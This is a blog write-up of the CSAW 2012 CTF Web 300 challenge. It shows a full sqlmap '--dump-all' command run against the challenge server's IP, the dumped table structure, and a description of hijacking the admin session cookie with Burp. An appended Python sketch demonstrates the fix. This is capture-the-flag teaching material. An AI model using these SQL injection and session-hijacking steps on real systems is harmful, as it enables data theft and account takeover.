Wednesday 3 October 2012

CSAW 2012 CTF - WEB 300 - Writeup


For this problem, we were given login credentials and told that the administrator has the key. After mapping the application and trying some test inputs, it was clear that the id parameter of the horse.php page was vulnerable to SQL injection: the database errors were displayed right on the page.

sqlmap made short work of dumping the database structure:

./sqlmap.py -u http://128.238.66.217/horse.php?id=1 --dump-all

<...snip...>
Database: csaw_chal1
Table: sessions
[0 entries]
+---------+------------+---------+
| user_id | session_id | session |
+---------+------------+---------+
+---------+------------+---------+
<...snip...>

Database: csaw_chal1
Table: users
[0 entries]
+---------+------+-------+----------+----------+
| user_id | name | level | username | password |
+---------+------+-------+----------+----------+
+---------+------+-------+----------+----------+

Unfortunately, due to the “WAF”, the database contents weren't automatically dumped. After some manual attempts a suitable bypass was found, and the password hash for the administrator user (Mr. Corgi) was retrieved from the users table. I let john attempt to crack it for a while while I finished off the reversing problems. However, after an hour or so the password still wasn't cracked, so I looked at impersonating the administrator. Fortunately, the sessions table contained an active session for the admin user.

Using Burp, I replaced my own session cookie with the extracted session key to impersonate the admin user, which produced the key.
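As an added example (not code from the original post or from the challenge itself), here is a small Python/sqlite3 sketch of the two weaknesses this solution chained together: an id parameter spliced straight into the query, as horse.php evidently did, beside a parameterized version, and a sessions table that stores only a hash of the token, so a dumped row no longer lets anyone impersonate the admin. The sessions table follows the columns sqlmap listed above; the horses table and its rows are constructed for the example.

```python
import hashlib
import secrets
import sqlite3

def make_db():
    # Constructed in-memory schema: sessions mirrors the sqlmap output,
    # horses is invented so horse.php-style lookups have something to return.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE horses (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE sessions (user_id INTEGER, session_id TEXT, session TEXT);
        INSERT INTO horses VALUES (1, 'Secretariat'), (2, 'Seabiscuit');
    """)
    return db

def horse_vulnerable(db, id_param):
    # Same defect as the challenge page: the untrusted id is concatenated into
    # the SQL text, so any input that parses as SQL rewrites the query.
    return db.execute(f"SELECT name FROM horses WHERE id = {id_param}").fetchall()

def horse_fixed(db, id_param):
    # Validate the type up front and bind the value as a parameter; the
    # database never sees the input as SQL. A web handler would answer 400
    # here instead of returning None.
    if not str(id_param).isdigit():
        return None
    return db.execute("SELECT name FROM horses WHERE id = ?", (int(id_param),)).fetchall()

def create_session(db, user_id):
    # Issue a random token but persist only its SHA-256 digest. A SQL
    # injection that dumps this table then yields hashes, not usable cookies.
    token = secrets.token_urlsafe(32)
    digest = hashlib.sha256(token.encode()).hexdigest()
    db.execute("INSERT INTO sessions VALUES (?, ?, ?)", (user_id, digest, "{}"))
    return token

def user_for_session(db, token):
    # Hash the presented cookie and look the digest up, again with a bound parameter.
    digest = hashlib.sha256(token.encode()).hexdigest()
    row = db.execute("SELECT user_id FROM sessions WHERE session_id = ?", (digest,)).fetchone()
    return row[0] if row else None
```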

Some other great write-ups on CSAW 2012:

http://eindbazen.net/
http://blog.lse.epita.fr/cat/writeups-csaw-ctf-2012-quals/
http://raidersec.blogspot.ca/2012/09/csaw-ctf-quals-2012-recon-1-3-writeup.html

Thanks again to the CSAW folks for putting this together.
